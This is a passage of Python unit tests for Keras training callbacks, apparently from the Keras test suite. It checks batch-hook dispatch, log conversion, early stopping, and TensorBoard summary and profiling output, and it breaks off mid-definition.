@test_combinations.run_all_keras_modes(always_skip_v1=True) def test_implements_batch_hooks(self): class MyCallbackWithBatchHooks(keras.callbacks.Callback): def __init__(self): self.train_batches = 0 self.test_batches = 0 self.predict_batches = 0 def on_train_batch_end(self, batch, logs=None): self.train_batches += 1 def on_test_batch_end(self, batch, logs=None): self.test_batches += 1 def on_predict_batch_end(self, batch, logs=None): self.predict_batches += 1 class MyCallbackWithTFBatchHooks(keras.callbacks.Callback): def __init__(self): super(MyCallbackWithTFBatchHooks, self).__init__() self._supports_tf_logs = True class MyCallbackWithoutBatchHooks(keras.callbacks.Callback): def __init__(self): self.epochs = 0 def on_epoch_end(self, epoch, logs=None): self.epochs += 1 x, y = np.ones((10, 1)), np.ones((10, 1)) model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') my_cb = MyCallbackWithBatchHooks() cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertTrue(cb_list._should_call_train_batch_hooks) self.assertTrue(cb_list._should_call_test_batch_hooks) self.assertTrue(cb_list._should_call_predict_batch_hooks) self.assertFalse(cb_list._batch_hooks_support_tf_logs) model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0) model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0) model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0) self.assertEqual(my_cb.train_batches, 2) self.assertEqual(my_cb.test_batches, 1) self.assertEqual(my_cb.predict_batches, 1) my_cb = MyCallbackWithTFBatchHooks() cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertTrue(cb_list._batch_hooks_support_tf_logs) my_cb = MyCallbackWithoutBatchHooks() cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertLen(cb_list.callbacks, 1) self.assertFalse(cb_list._should_call_train_batch_hooks) self.assertFalse(cb_list._should_call_test_batch_hooks) self.assertFalse(cb_list._should_call_predict_batch_hooks) model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0) model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0) model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_logs_conversion(self): assert_dict_equal = self.assertDictEqual class MutateNumpyLogs(CallAllHooks): def _run(self, *args, logs=None): logs = logs or args[-1] logs['numpy'] = 1 class MutateTensorFlowLogs(CallAllHooks): def __init__(self): super(MutateTensorFlowLogs, self).__init__() self._supports_tf_logs = True def _run(self, *args, logs=None): logs = logs or args[-1] logs['tf'] = 2 class AssertNumpyLogs(CallAllHooks): def _run(self, *args, logs=None): logs = logs or args[-1] assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2}) class AssertTensorFlowLogs(AssertNumpyLogs): def __init__(self): super(AssertTensorFlowLogs, self).__init__() self._supports_tf_logs = True cb_list = keras.callbacks.CallbackList([ MutateNumpyLogs(), MutateTensorFlowLogs(), AssertNumpyLogs(), AssertTensorFlowLogs() ]) assert len(cb_list.callbacks) == 4 cb_list.on_epoch_begin(0, logs={'all': 0}) cb_list.on_epoch_end(0, logs={'all': 0}) cb_list.on_predict_batch_begin(0, logs={'all': 0}) cb_list.on_predict_batch_end(0, logs={'all': 0}) cb_list.on_predict_begin(logs={'all': 0}) cb_list.on_predict_end(logs={'all': 0}) cb_list.on_test_batch_begin(0, logs={'all': 0}) cb_list.on_test_batch_end(0, logs={'all': 0}) cb_list.on_test_begin(logs={'all': 0}) cb_list.on_test_end(logs={'all': 0}) cb_list.on_train_batch_begin(0, logs={'all': 0}) cb_list.on_train_batch_end(0, logs={'all': 0}) cb_list.on_train_begin(logs={'all': 0}) cb_list.on_train_end(logs={'all': 0}) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_implements_batch_hooks_override(self): class MyCallback(keras.callbacks.Callback): def __init__(self, should_run=True): self.should_run = should_run self.train_batches = 0 self.test_batches = 0 self.predict_batches = 0 def on_train_batch_end(self, batch, logs=None): self.train_batches += 1 def on_test_batch_end(self, batch, logs=None): self.test_batches += 1 def on_predict_batch_end(self, batch, logs=None): self.predict_batches += 1 def _implements_train_batch_hooks(self): return self.should_run def _implements_test_batch_hooks(self): return self.should_run def _implements_predict_batch_hooks(self): return self.should_run x, y = np.ones((10, 1)), np.ones((10, 1)) model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') my_cb = MyCallback(should_run=True) cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertTrue(cb_list._should_call_train_batch_hooks) self.assertTrue(cb_list._should_call_test_batch_hooks) self.assertTrue(cb_list._should_call_predict_batch_hooks) model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0) model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0) model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0) self.assertEqual(my_cb.train_batches, 2) self.assertEqual(my_cb.test_batches, 1) self.assertEqual(my_cb.predict_batches, 1) my_cb = MyCallback(should_run=False) cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertFalse(cb_list._should_call_train_batch_hooks) self.assertFalse(cb_list._should_call_test_batch_hooks) self.assertFalse(cb_list._should_call_predict_batch_hooks) model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0) model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0) model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0) self.assertEqual(my_cb.train_batches, 0) self.assertEqual(my_cb.test_batches, 0) self.assertEqual(my_cb.predict_batches, 0) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_default_callbacks_do_not_call_batch_hooks(self): model = keras.Sequential([keras.layers.Dense(1)]) log_dir = self.get_temp_dir() cb_list = keras.callbacks.CallbackList([ keras.callbacks.TensorBoard(log_dir, profile_batch=0), keras.callbacks.ModelCheckpoint(log_dir), ], add_progbar=True, model=model, verbose=2, epochs=3) self.assertLen(cb_list.callbacks, 3) self.assertFalse(cb_list._should_call_train_batch_hooks) self.assertFalse(cb_list._should_call_test_batch_hooks) self.assertFalse(cb_list._should_call_predict_batch_hooks) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_change_tf_functions_during_fit(self): class ChangeFunctions(keras.callbacks.Callback): def on_epoch_end(self, epochs, logs=None): def new_fn(iterator): raise ValueError('New function substituted successfully.') self.model.train_function = new_fn self.model.test_function = new_fn self.model.predict_function = new_fn model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') x, y = np.ones((10, 10)), np.ones((10, 1)) with self.assertRaisesRegexp(ValueError, 'New function '): model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()]) with self.assertRaisesRegexp(ValueError, 'New function '): model.evaluate(x, y, batch_size=2) with self.assertRaisesRegexp(ValueError, 'New function '): model.predict(x, batch_size=2) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_stop_training_batch_level(self): class MyCallback(keras.callbacks.Callback): def __init__(self): super(MyCallback, self).__init__() self.batch_counter = 0 def on_train_batch_end(self, batch, logs=None): self.batch_counter += 1 if batch == 2: self.model.stop_training = True model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') x, y = np.ones((10, 10)), np.ones((10, 1)) my_cb = MyCallback() # Will run 5 batches if `stop_training` doesn't work. model.fit(x, y, batch_size=2, callbacks=[my_cb]) self.assertEqual(my_cb.batch_counter, 3) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_built_in_callback_order(self): class CustomCallback(keras.callbacks.Callback): pass class TestingCallbackList(keras.callbacks.CallbackList): def __init__(self, *args, **kwargs): super(TestingCallbackList, self).__init__(*args, **kwargs) if ((not isinstance(self.callbacks[0], CustomCallback)) or (not isinstance(self.callbacks[1], keras.callbacks.History)) or (not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))): raise AssertionError(f'Callback order unexpected: {self.callbacks}') with mock.patch.object( keras.callbacks, 'CallbackList', TestingCallbackList): model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') custom_callback = CustomCallback() model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5, callbacks=[custom_callback]) # A summary that was emitted during a test. Fields: # logdir: str. The logdir of the FileWriter to which the summary was # written. # tag: str. The name of the summary. _ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag')) class _SummaryFile: """A record of summary tags and the files to which they were written. Fields `scalars`, `images`, `histograms`, and `tensors` are sets containing `_ObservedSummary` values. """ def __init__(self): self.scalars = set() self.images = set() self.histograms = set() self.tensors = set() self.graph_defs = [] self.convert_from_v2_summary_proto = False def list_summaries(logdir): """Read all summaries under the logdir into a `_SummaryFile`. Args: logdir: A path to a directory that contains zero or more event files, either as direct children or in transitive subdirectories. Summaries in these events must only contain old-style scalars, images, and histograms. Non-summary events, like `graph_def`s, are ignored. Returns: A `_SummaryFile` object reflecting all summaries written to any event files in the logdir or any of its descendant directories. Raises: ValueError: If an event file contains an summary of unexpected kind. """ result = _SummaryFile() for (dirpath, _, filenames) in os.walk(logdir): for filename in filenames: if not filename.startswith('events.out.'): continue path = os.path.join(dirpath, filename) for event in tf.compat.v1.train.summary_iterator(path): if event.graph_def: result.graph_defs.append(event.graph_def) if not event.summary: # (e.g., it's a `graph_def` event) continue for value in event.summary.value: tag = value.tag # Case on the `value` rather than the summary metadata because # the Keras callback uses `summary_ops_v2` to emit old-style # summaries. See b/124535134. kind = value.WhichOneof('value') container = { 'simple_value': result.scalars, 'image': result.images, 'histo': result.histograms, 'tensor': result.tensors, }.get(kind) if container is None: raise ValueError( 'Unexpected summary kind %r in event file %s:\n%r' % (kind, path, event)) elif kind == 'tensor' and tag != 'keras': # Convert the tf2 summary proto to old style for type checking. plugin_name = value.metadata.plugin_data.plugin_name container = { 'images': result.images, 'histograms': result.histograms, 'scalars': result.scalars, }.get(plugin_name) if container is not None: result.convert_from_v2_summary_proto = True else: container = result.tensors container.add(_ObservedSummary(logdir=dirpath, tag=tag)) return result @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) class TestTensorBoardV2(test_combinations.TestCase): def setUp(self): super(TestTensorBoardV2, self).setUp() self.logdir = os.path.join(self.get_temp_dir(), 'tb') self.train_dir = os.path.join(self.logdir, 'train') self.validation_dir = os.path.join(self.logdir, 'validation') def _get_model(self, compile_model=True): layers = [ keras.layers.Conv2D(8, (3, 3)), keras.layers.Flatten(), keras.layers.Dense(1) ] model = test_utils.get_model_from_layers(layers, input_shape=(10, 10, 1)) if compile_model: opt = gradient_descent.SGD(learning_rate=0.001) model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) return model def test_TensorBoard_default_logdir(self): """Regression test for cross-platform pathsep in default logdir.""" os.chdir(self.get_temp_dir()) model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard() # no logdir specified model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(logdir='.') train_dir = os.path.join('.', 'logs', 'train') validation_dir = os.path.join('.', 'logs', 'validation') self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=train_dir, tag='epoch_loss'), _ObservedSummary(logdir=validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=validation_dir, tag='evaluation_loss_vs_iterations'), }) def test_TensorBoard_basic(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }) def test_TensorBoard_across_invocations(self): """Regression test for summary writer resource use-after-free. See: <https://github.com/tensorflow/tensorflow/issues/25707> """ model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir) for _ in (1, 2): model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }) def test_TensorBoard_no_spurious_event_files(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir) model.fit( x, y, batch_size=2, epochs=2, callbacks=[tb_cbk]) events_file_run_basenames = set() for (dirpath, _, filenames) in os.walk(self.train_dir): if any(fn.startswith('events.out.') for fn in filenames): events_file_run_basenames.add(os.path.basename(dirpath)) self.assertEqual(events_file_run_basenames, {'train'}) def test_TensorBoard_batch_metrics(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }, ) def test_TensorBoard_learning_rate_schedules(self): model = self._get_model(compile_model=False) opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1)) model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) model.fit( x, y, batch_size=2, epochs=2, callbacks=[keras.callbacks.TensorBoard(self.logdir)]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'), }, ) def test_TensorBoard_global_step(self): model = self._get_model(compile_model=False) opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1)) model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) model.fit( x, y, batch_size=2, epochs=2, verbose=0, callbacks=[ keras.callbacks.TensorBoard( self.logdir, update_freq=1, profile_batch=0, write_steps_per_second=True) ]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'), _ObservedSummary( logdir=self.train_dir, tag='epoch_steps_per_second'), _ObservedSummary( logdir=self.train_dir, tag='batch_steps_per_second'), }, ) def test_TensorBoard_weight_histograms(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1) model_type = test_utils.get_model_type() model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }, ) self.assertEqual( self._strip_layer_names(summary_file.histograms, model_type), { _ObservedSummary(logdir=self.train_dir, tag='bias_0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0'), }, ) def test_TensorBoard_weight_images(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, write_images=True) model_type = test_utils.get_model_type() model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }, ) self.assertEqual( self._strip_layer_names(summary_file.histograms, model_type), { _ObservedSummary(logdir=self.train_dir, tag='bias_0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0'), }, ) if summary_file.convert_from_v2_summary_proto: expected = { _ObservedSummary(logdir=self.train_dir, tag='bias_0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0'), } else: expected = { _ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'), } self.assertEqual( self._strip_layer_names(summary_file.images, model_type), expected ) def test_TensorBoard_projector_callback(self): layers = [ keras.layers.Embedding(10, 10, name='test_embedding'), keras.layers.Dense(10, activation='relu'), keras.layers.Dense(1, activation='sigmoid') ] model = test_utils.get_model_from_layers(layers, input_shape=(10,)) model.compile( optimizer='adam', loss=keras.losses.BinaryCrossentropy(from_logits=True), run_eagerly=test_utils.should_run_eagerly()) x, y = np.ones((10, 10)), np.ones((10, 10)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, embeddings_freq=1, embeddings_metadata={'test_embedding': 'metadata.tsv'}) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f: self.assertEqual(f.readlines(), [ 'embeddings {\n', (' tensor_name: ' '"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'), ' metadata_path: "metadata.tsv"\n', '}\n' ]) def test_custom_summary(self): if not tf.executing_eagerly(): self.skipTest('Custom summaries only supported in V2 code path.') def scalar_v2_mock(name, data, step=None): """A reimplementation of the scalar plugin to avoid circular deps.""" metadata = tf.compat.v1.SummaryMetadata() # Should match value in tensorboard/plugins/scalar/metadata.py. metadata.plugin_data.plugin_name = 'scalars' with tf.summary.experimental.summary_scope( name, 'scalar_summary', values=[data, step]) as (tag, _): return tf.summary.write( tag=tag, tensor=tf.cast(data, 'float32'), step=step, metadata=metadata) class LayerWithSummary(keras.layers.Layer): def call(self, x): scalar_v2_mock('custom_summary', tf.reduce_sum(x)) return x model = test_utils.get_model_from_layers([LayerWithSummary()], input_shape=(5,), name='model') model.compile( 'sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1) x, y = np.ones((10, 5)), np.ones((10, 5)) model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), _ObservedSummary( logdir=self.train_dir, tag='model/layer_with_summary/custom_summary'), _ObservedSummary( logdir=self.validation_dir, tag='model/layer_with_summary/custom_summary') }, ) def _strip_layer_names(self, summaries, model_type): """Deduplicate summary names modulo layer prefix. This removes the first slash-component of each tag name: for instance, "foo/bar/baz" becomes "bar/baz". Args: summaries: A `set` of `_ObservedSummary` values. model_type: The model type currently being tested. Returns: A new `set` of `_ObservedSummary` values with layer prefixes removed. """ result = set() for summary in summaries: if '/' not in summary.tag: raise ValueError('tag has no layer name: %r' % summary.tag) start_from = 2 if 'subclass' in model_type else 1 new_tag = '/'.join(summary.tag.split('/')[start_from:]) result.add(summary._replace(tag=new_tag)) return result def test_TensorBoard_invalid_argument(self): with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'): keras.callbacks.TensorBoard(wwrite_images=True) def test_TensorBoard_non_blocking(self): model = keras.Sequential([keras.layers.Dense(1)]) tb = keras.callbacks.TensorBoard(self.logdir) self.assertTrue(tb._supports_tf_logs) cb_list = keras.callbacks.CallbackList([tb], model=model, epochs=1, steps=100, verbose=0) tensor = tf.convert_to_tensor(1.) def mock_numpy(): raise RuntimeError( 'If this error is seen, TensorBoard is causing a blocking ' 'NumPy conversion.') with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy): logs = {'metric': tensor} cb_list.on_train_begin(logs) cb_list.on_epoch_begin(0, logs) cb_list.on_train_batch_begin(0, logs) cb_list.on_train_batch_end(0, logs) cb_list.on_epoch_end(0, logs) cb_list.on_train_end(logs) cb_list.on_test_begin(logs) cb_list.on_test_batch_begin(0, logs) cb_list.on_test_batch_end(0, logs) cb_list.on_test_end(logs) cb_list.on_predict_begin(logs) cb_list.on_predict_batch_begin(logs) cb_list.on_predict_batch_end(logs) cb_list.on_predict_end(logs) # Note that this test specifies model_type explicitly. @test_combinations.run_all_keras_modes(always_skip_v1=True) class TestTensorBoardV2NonParameterizedTest(test_combinations.TestCase): def setUp(self): super(TestTensorBoardV2NonParameterizedTest, self).setUp() self.logdir = os.path.join(self.get_temp_dir(), 'tb') self.train_dir = os.path.join(self.logdir, 'train') self.validation_dir = os.path.join(self.logdir, 'validation') def _get_seq_model(self): model = keras.models.Sequential([ keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)), keras.layers.Flatten(), keras.layers.Dense(1), ]) opt = gradient_descent.SGD(learning_rate=0.001) model.compile( opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) return model def _count_trace_file(self, logdir): profile_dir = os.path.join(logdir, 'plugins', 'profile') count = 0 for (dirpath, dirnames, filenames) in os.walk(profile_dir): del dirpath # unused del dirnames # unused for filename in filenames: if filename.endswith('.trace.json.gz'): count += 1 return count def fitModelAndAssertKerasModelWritten(self, model): x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir, write_graph=True, profile_batch=0) model.fit( x, y, batch_size=2, epochs=3, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag='keras'), }, ) if not model.run_eagerly: # There should be one train graph self.assertLen(summary_file.graph_defs, 1) for graph_def in summary_file.graph_defs: graph_def_str = str(graph_def) # All the model layers should appear in the graphs for layer in model.layers: if 'input' not in layer.name: self.assertIn(layer.name, graph_def_str) def test_TensorBoard_writeSequentialModel_noInputShape(self): model = keras.models.Sequential([ keras.layers.Conv2D(8, (3, 3)), keras.layers.Flatten(), keras.layers.Dense(1), ]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) self.fitModelAndAssertKerasModelWritten(model) def test_TensorBoard_writeSequentialModel_withInputShape(self): model = keras.models.Sequential([ keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)), keras.layers.Flatten(), keras.layers.Dense(1), ]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) self.fitModelAndAssertKerasModelWritten(model) def test_TensorBoard_writeModel(self): inputs = keras.layers.Input([10, 10, 1]) x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs) x = keras.layers.Flatten()(x) x = keras.layers.Dense(1)(x) model = keras.models.Model(inputs=inputs, outputs=[x]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) self.fitModelAndAssertKerasModelWritten(model) def test_TensorBoard_autoTrace(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=1, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_outerProfiler(self): """Runs a profiler session that interferes with the one from the callback. The callback will not generate a profile but execution will proceed without crashing due to unhandled exceptions. """ tf.profiler.experimental.start(logdir='') model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=1, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) tf.profiler.experimental.stop(save=False) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'), }, ) self.assertEqual(0, self._count_trace_file(logdir=self.train_dir)) def test_TensorBoard_autoTrace_tagNameWithBatchNum(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=2, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_profileBatchRangeSingle(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False) model.fit( x, y, batch_size=3, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { # Trace will be logged once at the batch it stops profiling. _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_profileBatchRangeTwice(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False) model.fit( x, y, batch_size=3, epochs=10, validation_data=(x, y), callbacks=[tb_cbk]) time.sleep(1) # Avoids the second profile over-writing the first. model.fit( x, y, batch_size=3, epochs=10, validation_data=(x, y), callbacks=[tb_cbk]) self.assertEqual(2, self._count_trace_file(logdir=self.logdir)) # Test case that replicates a Github issue. # https://github.com/tensorflow/tensorflow/issues/37543 def test_TensorBoard_autoTrace_profileTwiceGraphMode(self): tf.compat.v1.disable_eager_execution() inp = keras.Input((1,)) out = keras.layers.Dense(units=1)(inp) model = keras.Model(inp, out) model.compile(gradient_descent.SGD(1), 'mse') logdir = os.path.join(self.get_temp_dir(), 'tb1') model.fit( np.zeros((64, 1)), np.zeros((64, 1)), batch_size=32, callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)], ) # Verifies trace exists in the first logdir. self.assertEqual(1, self._count_trace_file(logdir=logdir)) logdir = os.path.join(self.get_temp_dir(), 'tb2') model.fit( np.zeros((64, 1)), np.zeros((64, 1)), batch_size=32, callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)], ) # Verifies trace exists in the second logdir. self.assertEqual(1, self._count_trace_file(logdir=logdir)) def test_TensorBoard_autoTrace_profileBatchRange(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False) model.fit( x, y, batch_size=4, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { # Trace will be logged once at the batch it stops profiling. _ObservedSummary(logdir=self.train_dir, tag=u'batch_3'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_profileInvalidBatchRange(self): with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='-1,3', write_graph=False) with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='1,None', write_graph=False) with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False) with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False) def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) # Enabled trace only on the 10000th batch, thus it should be empty. self.assertEmpty(summary_file.tensors) self.assertEqual(0, self._count_trace_file(logdir=self.train_dir)) class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase): def test_get_most_recently_modified_file_matching_pattern(self): file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5'] ] for file_path in file_paths: with open(file_path, 'w') as f: # Ensure there are some intervals between file creation. time.sleep(2) f.write('foo bar') # Ensure the files have been actually written. self.assertEqual( set([ os.path.join(test_dir, file_name) for file_name in os.listdir(test_dir) ]), set(file_paths)) self.assertEqual( keras.callbacks.ModelCheckpoint(None) ._get_most_recently_modified_file_matching_pattern(path_pattern), file_paths[-1]) def 